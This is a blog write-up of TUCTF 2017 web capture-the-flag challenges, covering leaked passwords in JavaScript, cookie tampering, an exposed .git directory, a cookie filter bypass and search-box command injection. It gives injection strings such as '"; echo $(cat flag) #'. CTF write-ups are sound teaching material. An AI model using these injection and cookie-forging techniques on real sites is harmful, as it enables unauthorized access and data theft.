An Utsusemi of Keramas

Tales of security research, penetration testing, red teaming, and general hacking shenanigans.

27 November 2017

TUCTF 2017 | Web Challenges

by Keramas

Challenge:
High Source
Category:
Web



Accessing the web page and immediately looking at the source we get trolled. Nothing here... But what about in the login.js source?



Oh hey, a password! Using this to login we then get our flag!






Challenge:
Cookie Duty
Category:
Web




The first page we land on gives a good hint as to what this will entail with cookies... We aren't admin, but can we become an admin by modifying the cookie? "not_admin" is set to a 1 flag, so if we modify this to a 0 we should be able to become admin.



Changing the cookie and making a GET request with Burp Suite, we trick it to thinking we are admin and get our flag!




Challenge:
Git Gud
Category:
Web



Based on the challenge description we know that the site is using Version Control Systems and the title also gives it away that we are looking for something git-related. After researching some stuff about this, it's possible to access a directory at /.git which gives all of the history info, objects, what have you.



To make this a bit easier, I just downloaded everything and used comannd line to traverse through the directories. In the master file you can see an update entry for adding a flag, and using the data on the left we can cat the info until we are able to see the past entry and get our flag!






Challenge:
Cookie Harrelson
Category:
Web



More cookies! Inspecting the response/request headers upon loading, we can see that there is a cookie being passed.



This coded in base64, and decoding it we get:
cat index.txt

Neat... so what if we just encode something like 'cat flag.txt' in base64 and swap it in? Well, this is what I did, but it wasn't as easy as that. Unfortunately when subbing in something different, the cookie gets modified and it becomes something like this:

cat index.txt #(new command here)

So we are getting filtered and need to bypass it somehow! After a lot of experimentation/trial and error, the trick here is to get a carriage return. Using Burp to decode the original cookie, modify it, and then re-encode it, we get our new cookie.



Now we can put this in the repeater and make our GET request, which gives us the flag!





Challenge:
iFrame and Shame
Category:
Web



This challenge took a bit of trial and error to solve. I started by checking for input validation in the search box by adding an " and that seemed to break the format a bit, which kind of tipped me off there may be a possibility for code injection.

After trying different things for a while, the following command worked as a test:
"; echo $(ls) #



Based on this, we just change our command to give us our flag:
"; echo $(cat flag) #



tags: CTF challenge